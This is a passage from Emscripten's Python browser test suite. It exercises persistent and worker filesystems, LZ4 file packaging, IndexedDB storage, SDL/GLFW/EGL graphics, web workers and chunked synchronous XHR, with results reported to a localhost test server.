self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME'] + self.get_async_args()
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = self.get_async_args() + ['-s', 'EXIT_RUNTIME']
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_test_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_test_file('file1.txt', 'first')
ensure_dir('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_test_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' modularize')
self.compile_btest([path_from_root('tests', 'fs', 'test_lz4fs.cpp'), '--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-s', 'MODULARIZE=1'])
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
self.run_browser('a.html', '.', '/report_result?2')
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2', '--closure', '1', '-g1', '-s', 'CLOSURE_WARNINGS=quiet'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_test_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2'] + self.get_async_args())
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'INITIAL_MEMORY=80MB'] + self.get_async_args())
def test_force_exit(self):
self.btest('force_exit.c', force_c=True, expected='17', args=['-s', 'EXIT_RUNTIME'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest_exit('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file',
path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([path_from_root('tests', 'sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.compile_btest([path_from_root('tests', 'test_egl.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER')
def _test_egl_width_height_base(self, *args):
self.compile_btest([path_from_root('tests', 'test_egl_width_height.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_test_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
self.run_process(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
self.compile_btest([path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception as e:
print('(sleep for server)')
time.sleep(1)
if i == 60:
raise e
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-s', 'USE_PTHREADS'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest_exit('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
with open('test.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.o'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.o'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.o'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-s', 'FULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-s', 'FULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_test_file('script1.js', '''
Module._set(456);
''')
create_test_file('file1.txt', 'first')
create_test_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'EXIT_RUNTIME']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'AUTO_JS_LIBRARIES=0']
]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by dEQP text suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
